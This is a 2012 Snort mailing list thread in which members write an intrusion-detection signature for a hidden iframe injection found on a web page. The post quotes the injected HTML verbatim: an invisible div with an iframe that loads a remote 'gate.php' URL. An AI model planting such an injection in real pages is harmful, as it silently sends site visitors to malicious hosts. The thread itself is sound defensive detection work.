Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Rule thought

From: "lists () packetmail net" <lists () packetmail net>
Date: Mon, 6 Aug 2012 13:27:25 -0500
On 08/06/12 13:13, James Lay wrote:

All,

Recently (today) I ran into the below:

<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div
 
class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673   
frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 
border=0></iframe></div><!--/qpi-->

I've not seen an iframe injection that included a specified class 
before.  My original draft rule looked like:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data; 
pcre:"/<\/style><div class=[a-z]{9}><iframe src/i"; 
classtype:web-application-attack; sid:10000017; rev:1;)

But this looks pretty expensive.  I'm sure there's a better way to 
match this...would it be something like:

content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe 
src";

My question is how do I tell Snort to match all three consecutively?  I 
get that I could use within, but would that apply to the pcre?  Thanks 
for any advice.


I think there's more of an abnormality around the unquoted URL in the iframe and
I'm not certain the class will always be 9 characters, but assuming it is how about:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"INDICATOR-COMPROMISE
div tag with class preceding iframe to specific URL"; flow:from_server,
established; file_data; content:"<div class="; content:"<iframe src=http:";
fast_pattern; within:30; pcre:"/<div class=[a-z]{9}><iframe
src=http[^\x3e]+\.php\?[a-z]=\d+\x20/"; classtype:bad-unknown; sid:x; rev:1;)

Just a thought...  Joel will probably want to add /smi ;)




------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: